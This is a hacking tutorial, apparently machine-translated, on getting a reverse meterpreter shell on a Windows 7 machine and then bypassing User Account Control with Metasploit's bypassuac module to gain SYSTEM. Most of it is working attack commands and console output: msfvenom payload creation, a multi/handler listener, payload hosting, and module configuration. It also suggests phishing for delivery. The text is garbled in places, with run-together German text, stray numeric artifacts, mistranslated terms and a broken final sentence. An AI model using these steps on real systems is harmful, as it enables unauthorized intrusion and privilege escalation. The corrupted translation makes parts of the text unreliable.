UAC is something we all dealt with under Windows, either as a user, administrator or attacker. It is a core feature of the Windows security model, and most of the time it is done as it should. It can be frustrating for hackers to try to extend their privileges, but it's easy enough to bypass UAC and get system access with Metasploit.
In our demonstration, we use Kali Linux to attack a Windows 7 box. If you have access to a Windows 7 exercise computer, you can track it step by step, but it will work with other versions of Windows as well. However, for this to work, a user with administrative privileges must be present on the target computer. Therefore make sure that this is the case.
User Account Control Overview
User Account Control is a security feature of Windows that limits the ability of a standard user until an administrator grants a temporary elevation of privilege. We all dealt with the annoying pop-up window when we tried to install software or run a specific program, but this feature helps keep malware at bay by allowing only higher-privilege applications to run on demand.
This feature was first introduced in Windows Vista and is still available today on Microsoft operating systems. It can be disabled, but a decent system administrator would never allow it. From an attacker's point of view, it can be difficult to increase permissions for a user because user account control prevents escalation, even if that user has administrator privileges.
Meterpreter has a built-in command to fetch the system, but if User Account Control is enabled it will not work. Luckily, there is a way to get around this. Metasploit makes it easy to bypass user account control, escalate permissions, and have the system in just a few steps.
Step 1: compromise the target.
~ # mkdir temp ~ # cd temp /
The first thing we need to do is get a shell with low privileges for the target. For demonstration purposes, we'll build a simple payload with MSFvenom and save it as an executable to run on the target.
~ / temp # msfvenom -p windows / x64 / meterpreter / reverse_tcp lhost = 10.10.0.1 lport = 1234 -f exe -o pwn.exe [-] No platform was selected, and Msf :: Module :: Platform :: Windows was selected from the payload [-] No arc selected, selection of the bow: x64 from the payload No encoders or badchars were output that output raw user data Payload size: 510 bytes Final size of the exe file: 7168 bytes Filed as: pwn.exe
The following happens in the above command:
- The flag -p indicates the payload.
- lhost is our local machine to connect to. 19659014] lport is the local port for the connection to
- . The flag -f determines the format.
- Flag -o specifies the output file.
Now In order for our file to be saved, we need to set up a listener to reconnect as soon as it is executed. Open a new tab or terminal window and start Metasploit with the command msfconsole . We can use the versatile multi-handler to catch our reverse shell.
~ # msfconsole msf5> use exploit / multi / handler
All we have to do is set the options to match the information in the previously created executable file. Set the payload and as such:
msf5 exploit (multi / handler)> set payload windows / x64 / meterpreter / reverse_tcp Payload => windows / x64 / meterpreter / reverse_tcp msf5 exploit (multi / handler)> set lhost 10.10.0.1 lhost => 10.10.0.1 msf5 exploit (multi / handler)> set lport 1234 lport => 1234
Enter run and the handler waits for incoming connections.
msf5 exploit (multi / handler)> run [*] The reverse TCP handler was on 10.10.0.1:1234[19659010lightboxesgestartetZurückinunseremArbeitsverzeichniskönnenwireinenHTTP-ServerstartenumunsereDateizuhostenAlleswasdasOpfertunmussisteineVerbindungzuunsherzustellendieDateiherunterzuladenundstarteesInderrealenWeltkanndiesaufverschiedeneArtenerreichtwerdeneinschließlichSocialEngineeringoderPhishing-AngriffenWirwerdenesvorersteinfachhalten
Wir could start Apache and provide the file from there, but there is a Python module named SimpleHTTPServer which is lightweight and easy to use, and can be run from anywhere without setup. Start it with the following command:
~ / temp # python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 Port 8000 ...
Now the victim just needs to connect to our computer on port 8000 to retrieve the file. On the target, navigate to the IP address of the attacking computer and download the file.
Then simply save and run them:
If everything works smoothly, a meterpreter session should be set up again on our handler.
msf5 exploit (multi / handler)> run [*] The reverse TCP handler was started on 10.10.0.1:1234 [*] Transmission Level (206403 Bytes) to 10.10.0.104 [*] Meterpreter Session 1 has been opened (10.10.0.1:1234 -> 10.10.0.104:49224) at 2019-04-08 11:22:17 -0500
At this point we can stop the Python server, since we have successfully connected to the goal.
Now that we have a Meterpreter session, we can see which user we are using with the getuid command.  meterpreter> getuid
Server username: DLAB admin2
The name is displayed as "admin2". Therefore, there is a good chance that this user has administrator rights. Let's try to escalate with the command getsystem .
meterpreter> getsystem [-] priv_elevate_getsystem: Operation failed: The environment is wrong. The following was tried: [-] Named Pipe Impersonation (In Memory / Admin) [-] Named Pipe Impersonation (Dropper / Admin) [-] Token Duplication (In Memory / Admin)
And it fails. We can see that this command will try three methods to escalate permissions and issue an environment error. We can try each of these methods individually. Use the flag -h to display help for this command.
meterpreter> getsystem -h Use: getsystem [options] Try to increase your right to that of the local system. OPTIONS: -h help banner. -t
The technique to use. (Default is & # 39; 0 & # 39;). 0: All available techniques 1: Named Pipe Impersonation (In Memory / Admin) 2: Named Pipe Impersonation (Dropper / Admin) 3: Token Duplication (In Memory / Admin)
If you use the -t flag, you can specify which technique to use. Let's try the first one:
meterpreter> getsystem -t 1 [-] priv_elevate_getsystem: Operation failed: Access denied. The following was tried: [-] Named Pipe Impersonation (In Memory / Admin)
Now the error message "Access denied" appears. It may not seem that way, but that's good. Next we bypass user account control and get system access.
You can use a Metasploit module to bypass the User Account Control feature on Windows. However, you must first run the current session in the background. To do this, enter Background .
meterpreter> background [*] Background Session 1 ...
Use the search command in Metasploit to find a suitable exploit.
msf5> search uac Matching modules ================ # Name Disclosure Date Rank Check Description - ---- ---------------- ---- ----- ----------- 1 Exploit / windows / local / ask 2012-01-03 excellent No Windows Escalate Run UAC RunAs 2 Exploit / windows / local / bypassuac 2010-12-31 excellent No Windows Escalates the UAC protection bypass 3 Exploit / windows / local / bypassuac_comhijack 1900-01-01 Excellent Yes Windows Escalate UAC Protection Bypass (About COM Handler Hijack) 4 Exploit / windows / local / bypassuac_eventvwr 15/08/2016 excellent Yes Windows Escalation UAC protection bypass (via Eventvwr registry key) 5 Exploit / windows / local / bypassuac_fodhelper 05/12/2017 excellent Yes Bypassing Windows UAC protection (via the FodHelper registry key) 6 Exploit / windows / local / bypassuac_injection 2010-12-31 excellent No Windows bypass for escalated UAC protection (In Memory Injection) 7 exploit / windows / local / bypassuac_injection_winsxs 2017-04-06 excellent No Windows bypass to escalate UAC protection (In Memory Injection) that misuses WinSXS 8 Exploit / windows / local / bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC protection bypass (via taking over Slui file handler) 9 Exploit / windows / local / bypassuac_vbs 2015-08-22 excellent No Windows Escalation UAC protection bypass (ScriptHost Vulnerability) 10 post / windows / gather / win_privs normal No enumeration of Windows permissions No postkey-keys Persistence module
We want number two, the "Bypassuac" Exploit – load the module with the command use .
msf5> use exploit / windows / local / bypassuac
Check out the options to see what we need.
msf5 exploit (windows / local / bypassuac)> options Module options (Exploit / windows / local / bypassuac): Name Current setting Required Description ---- --------------- -------- ----------- SESSION yes The session on which to run this module. TECHNIQUE EXE yes Technique to use when User Account Control is disabled (Accepts: PSH, EXE) Take advantage of the goal: ID name - ---- 0 Windows x86
It looks like the session that was previously stored in the background is needed. Since we use 64-bit Windows, we also need to set the target to 64-bit. Use the command show to display available targets.
msf5 exploit (windows / local / bypassuac)> Show Destinations Exploit targets: ID name - ---- 0 Windows x86 1 Windows x64
And set the destination and session numbers.
msf5 exploit (windows / local / bypassuac)> set target 1 Destination => 1 Msf5 exploit (Windows / Local / Bypassuac)> Set session 1 session => 1
We also need to specify a payload, so we use the trusted meterpreter reverse TCP again.
msf5 exploit (windows / local / bypassuac)> set payload windows / x64 / meterpreter / reverse_tcp Payload => windows / x64 / meterpreter / reverse_tcp msf5 exploit (windows / local / bypassuac)> set lhost 10.10.0.1 lhost => 10.10.0.1 msf5 exploit (windows / local / bypassuac)> set lport 1234 lport => 1234
Everything should be fine, so enter run to start the exploit.
msf5 exploit (windows / local / bypassuac)> run [*] The reverse TCP handler was started on 10.10.0.1:1234 [*] User Account Control is enabled and checks the level ... [+] User Account Control is set to default [+] BypassUAC can bypass this setting and ... [+] Part of the Administrators group! Continuing... [*] The agent has been uploaded to the file system .... [*] Upload of the executable bypass UAC to the file system ... [*] Meterpreter stager executable file with 7168 bytes being uploaded. [*] Transmission Level (206403 Bytes) to 10.10.0.104 [*] Meterpreter Session 2 was opened on 2019-04-08 11:30:04 -0500 (10.10.0.1:1234 -> 10.10.0.104:49235) meterpreter>
It shows how to check User Account Control and if the user is part of the Administrators group and a new session has been successfully opened. Let's do getuid again.
meterpreter> getuid Servername: DLAB admin2
We can see that we are still admin2 – the exploit does not let us automatically land in the system account. But now, when we run getsystem we can successfully bypass UAC and escalate privilege. Meterpreter> getsystem
… received the system via technique 1 (named pipe impersonation (in memory / admin)).
And now we can confirm that we finally have system access.
meterpreter> getuid Server Username: NT AUTHORITY SYSTEM
Today we learned a little about user account control and how to protect Windows from unauthorized access. We explained how to reach the goal initially and tried to extend the rights. If this did not work, we used a Metasploit module to work around the restriction and ultimately get system-level permissions for the target a trusted app